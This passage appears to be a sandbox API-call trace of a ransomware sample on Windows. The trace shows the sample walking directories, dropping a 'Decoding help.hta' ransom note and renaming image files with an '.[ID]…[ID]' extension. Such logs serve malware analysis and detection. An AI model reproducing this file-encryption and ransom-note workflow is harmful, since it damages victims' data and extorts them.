(hObject=0xb94) returned 1 [0058.374] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x19d5fd30 | out: lpFindFileData=0x19d5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0058.374] FindClose (in: hFindFile=0x5e28f0 | out: hFindFile=0x5e28f0) returned 1 Thread: id = 696 os_tid = 0xf28 [0054.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*.*", lpFindFileData=0x19e5fd30 | out: lpFindFileData=0x19e5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7f10 [0062.540] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.540] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x19e5fd30 | out: lpFindFileData=0x19e5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.540] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.540] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.541] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x19e5fd30 | out: lpFindFileData=0x19e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f26d00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f26d00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1015d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IRIS.ELM", cAlternateFileName="")) returned 1 Thread: id = 697 os_tid = 0xf2c [0054.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*", lpFindFileData=0x1a11fd30 | out: lpFindFileData=0x1a11fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2cb0 [0058.990] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.990] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1a11fd30 | out: lpFindFileData=0x1a11fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.990] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.990] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1a11fd30 | out: lpFindFileData=0x1a11fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0058.990] lstrcmpW (lpString1=".", lpString2="x64") returned -1 [0058.990] lstrcmpW (lpString1="..", lpString2="x64") returned -1 [0058.991] lstrcmpiW (lpString1="windows", lpString2="x64") returned -1 [0058.991] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*" [0058.991] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*") returned 92 [0058.991] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\", lpString2="x64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0058.991] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*" [0058.991] GlobalMemoryStatus (in: lpBuffer=0x1a11fd10 | out: lpBuffer=0x1a11fd10) [0058.991] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11077800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x894 [0058.992] CloseHandle (hObject=0x894) returned 1 [0058.992] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1a11fd30 | out: lpFindFileData=0x1a11fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0058.992] FindClose (in: hFindFile=0x5e2cb0 | out: hFindFile=0x5e2cb0) returned 1 Thread: id = 698 os_tid = 0xf30 [0054.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*", lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8510 [0055.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.578] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.578] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.578] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.578] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3769c1c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb3769c1c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-desk.png", cAlternateFileName="")) returned 1 [0055.710] lstrcpyW (in: lpString1=0x2a8a87f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0055.710] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0055.710] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0055.710] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0xffffffff [0055.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x87c [0056.217] WriteFile (in: hFile=0x87c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1a21fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1a21fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.491] CloseHandle (hObject=0x87c) returned 1 [0057.491] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.491] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bg-desk.png") returned 1 [0057.491] lstrlenW (lpString="bg-desk.png") returned 11 [0057.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0057.491] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0057.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bg-desk.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" [0057.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" [0057.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.[ID]g9uZrLhJaygpwRm1[ID]" [0057.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.893] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e7160b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e7160b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-dock.png", cAlternateFileName="")) returned 1 [0058.893] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0058.893] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0058.893] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0058.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0058.893] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bg-dock.png") returned 1 [0058.894] lstrlenW (lpString="bg-dock.png") returned 11 [0058.894] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0058.894] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0058.894] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bg-dock.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" [0058.894] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" [0058.894] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.894] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-today.png", cAlternateFileName="")) returned 1 [0058.894] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0058.894] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0058.894] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0058.894] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0058.894] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bg-today.png") returned 1 [0058.894] lstrlenW (lpString="bg-today.png") returned 12 [0058.894] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0058.894] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0058.894] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bg-today.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" [0058.894] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" [0058.894] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.252] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb378fd7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-disable.png", cAlternateFileName="")) returned 1 [0059.252] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.252] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0059.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0059.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0059.252] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bNext-disable.png") returned 1 [0059.252] lstrlenW (lpString="bNext-disable.png") returned 17 [0059.252] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.252] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0059.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bNext-disable.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" [0059.252] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" [0059.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.252] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, 